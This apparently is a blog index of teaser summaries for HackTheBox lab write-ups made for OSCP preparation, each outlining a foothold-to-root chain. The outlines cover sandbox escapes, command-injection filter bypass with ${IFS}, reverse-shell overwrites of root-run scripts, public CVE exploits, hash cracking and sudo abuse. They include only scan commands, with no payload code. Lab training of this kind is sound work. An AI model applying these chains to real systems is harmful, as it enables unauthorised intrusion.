Linux

Sandboxes are only as strong as their implementation. Codify gives you a Node.js code editor to play with - and a vm2 version that plays right back. Machine info Name Codify Platform HackTheBox OS Linux Difficulty Easy TL;DR Web app runs Node.js snippets in a vm2 sandbox; child_process is blocked, but vm2’s context escaping lets you break out entirely Shell as svc, linpeas finds a SQLite database with a bcrypt hash for joshua - cracked with John + rockyou SSH as joshua, sudo -l shows /opt/scripts/mysql-backup.sh as root; the script uses unquoted [[ $DB_PASS == $USER_PASS ]] enabling glob-based password brute-forcing Alternatively, compile and run the dirtyfrag LPE directly as svc and skip joshua entirely Recon Nmap 1 nmap -sV -sC -Pn -A codify.htb ...

Error pages usually get ignored. On CozyHosting, the /error page is what gives the whole game away. Machine info Name CozyHosting Platform HackTheBox OS Linux Difficulty Easy TL;DR A Spring Boot Whitelabel Error page reveals the framework; a targeted wordlist uncovers /actuator/sessions leaking a valid session token Cookie swap into /admin exposes an SSH connection form; the username field is injectable but blocks spaces - bypassed with ${IFS} Shell lands as app, a .jar in /app contains application.properties with PostgreSQL credentials Crack the bcrypt admin hash with John, su josh, find sudo /usr/bin/ssh *, and GTFOBins the ProxyCommand to root Recon Nmap 1 nmap -sV -sC -Pn -A cozyhosting.htb ...

Bashed is a good reminder that developers are the best pentesters’ allies - a web shell left in /dev does most of the work for you, and the path to root runs through a misconfigured sudo and a predictable job. Machine info Name Bashed Platform HackTheBox OS Linux Difficulty Easy TL;DR FeroxBuster finds a /dev directory hosting phpbash.php - an interactive PHP web shell Shell as www-data, sudo -l reveals we can run anything as scriptmanager without a password A job runs /scripts/test.py as root - overwrite it with a reverse shell payload to escalate Recon Nmap 1 nmap -sV -sC -Pn -A 10.129.0.0 ...

BoardLight chains together a few classic techniques: subdomain discovery leading to an exposed ERP, authenticated RCE via a known CVE, credential reuse to pivot to a real user, and a SUID binary chain to root. Machine info Name BoardLight Platform HackTheBox OS Linux Difficulty Easy TL;DR Subdomain enumeration reveals crm.board.htb running Dolibarr 17.0.0 Default admin:admin credentials get us in CVE-2023-30253 - PHP code injection via the website module - gives shell as www-data Database credentials in conf.php are reused by user larissa for SSH CVE-2022-37706 - Enlightenment SUID LPE - escalates to root Recon Nmap 1 nmap -sV -sC -Pn -A 10.129.0.0 ...

Next up: Analytics, an Easy Linux box. Pre-auth RCE on Metabase, Docker escape via environment variable credential leak, and a kernel exploit chain for root. Machine info Name Analytics Platform HackTheBox OS Linux Difficulty Easy TL;DR Metabase 0.46.6 vulnerable to pre-auth RCE (CVE-2023-38646) Initial shell lands inside a Docker container Environment variables leak SSH credentials (metalytics:An4lytics_ds20223#) SSH to the host as metalytics, then kernel exploit CVE-2023-2640 + CVE-2023-32629 (overlayfs) for root Recon RustScan + Nmap 1 rustscan -a 10.129.21.240 -- -sV -sC -Pn -A ...

Another one down from the Lain Kusanagi list - this time it’s Nibbles, an Easy Linux box. Classic web enumeration into authenticated RCE, with a clean sudo privesc to wrap it up. Machine info Name Nibbles Platform HackTheBox OS Linux Difficulty Easy TL;DR Nibbleblog v4.0.3 with default credentials (admin:nibbles) Authenticated file upload RCE (CVE-2015-6967) for initial shell as nibbler sudo -l reveals monitor.sh can be run as root with NOPASSWD Overwrite monitor.sh with SUID payload on /bin/bash to get root Recon RustScan + Nmap 1 rustscan -a 10.129.20.162 -- -sV -sC -Pn -A ...

Why this post exists This is the first in a series of write-ups I’m publishing as part of my OSCP preparation. The strategy is to follow the Lain Kusanagi curated list (a fork/evolution of the classic TJNull list), which selects HackTheBox machines with attack vectors and exploitation patterns similar to those found in the exam. The goal of these posts is not just to document the solution, but to consolidate what I’ve learned: each write-up is structured as a condensed pentest report - recon, enumeration, foothold, privesc and takeaways - in the same format OffSec expects in the exam. ...